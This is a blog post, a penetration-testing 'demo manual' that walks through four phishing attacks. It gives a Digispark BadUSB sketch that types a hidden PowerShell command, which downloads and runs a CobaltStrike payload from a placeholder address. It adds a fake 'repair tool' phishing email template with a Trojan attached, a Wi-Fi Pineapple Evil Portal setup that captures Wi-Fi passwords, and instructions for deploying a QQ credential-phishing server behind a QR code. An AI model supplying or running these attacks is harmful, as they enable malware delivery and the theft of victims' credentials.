Posted Updated Penetration7 minutes read (About 1096 words)

Four Phishing Scenes Demo Manual

BadUSB Phishing CS released

Use the tool Digispark, shaped like a USB memory stick, and use the Arduino compilation to burn programs into it.

Install Arduino debugging software

  1. Open the Arduino website Arduino - Home and click Software.

image.png

  1. Download the Windows version of the software (the one that says Win7 or newer on the right) to install

image.png
image.png

  1. Install the software, which will prompt you to install a USB drive, click Install

image.png

  1. The installation is successful as shown in the following figure
    image.png

Configuring Digispark in the Arduino board

  1. In Additional Board Manager URLs, add:
    1
    https://raw.githubusercontent.com/ArminJo/DigistumpArduino/master/package_digistump_index.json

image.png

  1. Click Development Edition Management, and search for digistump , you can find this development version configuration information, install this Digistump AVR Boards
    image.png
    image.png

  2. Click Development Boards - > Digistump AVR Boards - > Digispark (Default - 16.5mhz)

Upload program

  • Upload the program you want to execute, enter the code you want to upload, and click the right arrow to upload (the one on the left is verification, uploading includes the steps of verification)

When uploading, it will let you save the program in one place, save it in one place at will.
image.png
image.png

Case 1: Pop-up Notepad

If you want to pop-up notepad, burn the following program:

1
2
3
4
5
6
7
8
9
10
11
12
#include "DigiKeyboard.h"
void setup() {
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
  delay(500);
  DigiKeyboard.println("notepad");
  delay(500);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
}
void loop()
{
}

image.png

Case 2: CS release

Where xxxx is the CobaltStrike HTTP release address

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#include <DigiKeyboardFr.h>
void setup() {
  DigiKeyboard.delay(5000);
  DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_CAPSLOCK);
  DigiKeyboard.delay(500);
  DigiKeyboard.println("powershell.exe -nop -w hidden -c 'IEX ((new-object net.webclient).downloadstring('xxxx'))'");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.sendKeyStroke(KEY_CAPSLOCK);
}
void loop()
{
}
  • Insert Digispark to release it~

Mail phishing CS release

Email content

Email content (this requires the user to write a paragraph):

Recently, there has been a xx vulnerability. The company contacted the xx manufacturer to provide a xx vulnerability repair tool. Please be sure to open it for repair
Download the repair tool:xxxx

  • And you can put a Trojan File into this phishing mail~

Wi-Fi Pineapple Wi-Fi Phishing information collection

Start pineapple pie, install 4 net cables and plug in power

image.png

Start the pineapple pie

  1. Connect to the pineapple pie management WIFI
  2. Open the browser and visit the pineapple pie management address: 172.16.42.1:1471, You can access the administrative address of Wifi Pineapple
    image.png

image.png

Configure network bridging (networking pineapple pie)

The purpose of this operation is to logically:

Victim -> Pineapple pie -> Internet

The network structure allows the victim to connect to the pineapple pie’s phishing wifi and still be able to access the Internet, but the victim does not know that there is a pineapple pie between him and the Internet
image.png

(When you click scan to scan the wifi, you can click several times until you scan the available wifi)

image.png
image.png

Phishing with the Evil Portal plugin

image.png

Then the victim will search for your phishing wifi SSID in his WIFI, and a pop-up window will appear on the landing page

  • Enter the password and you will be phished~
    image.png

If you want to make changes to the phishing page

When you have bridged the pineapple pie to the network, the pineapple pie itself can connect to the external network

Connect to the pineapple pie management address just created, use XSHELL or the command line ssh connection tool, use ssh to log in to the pineapple pie terminal.

After successful login, the display looks like this.

image.png

Use the command to enter the port-xxxx directory(The filepath of your phishing website)

1
cd portals/xxxx/

You can see the relevant web files, just modify them~

How to check phishing passwords

Log in to the backend of pineapple pie and enter the portal/xxxx folder
The password is stored in the pwd.txt file
image.png

QR code phishing information collection

Let the victim directly scan the QR code, you can pop up the pop-up window of the QQ Zone (just for demonstration, modify its front-end page to make it more simulation), the victim fills in the account password, you can receive the information filled in at the server level, resulting in information leakage

Build your own QR code phishing server receiver

Visit github for a detailed build tutorial:
GitHub - Cl0udG0d/QQFishing: QQ钓鱼,社会工程

  • Set up this service on your own server (you need to install docker-compose in advance), and then execute the following commands in sequence:
1
2
3
git clone https://github.com/Cl0udG0d/QQFishing
cd QQFishing
docker-compose up -d

After setting up, access the server http://IP:5000 to access its phishing address

image.png

Generate QR code

Baidu casually search for a QR code generation online tool that can embed pictures, such as:
免费在线二维码生成器

Generate the phishing URL as a QR code, and the victim can scan the QR code to achieve the purpose of opening the phishing page, such as
image.png
(This QR code is just an example, users need to regenerate it themselves)

Four Phishing Scenes Demo Manual

https://resek4.github.io/2022/07/15/Four Phishing Scenes Demo Manual/

Author

Resek4

Posted on

2022-07-15

Updated on

2023-03-23

Licensed under

Comments

Follow

Archives

Categories

Recents

×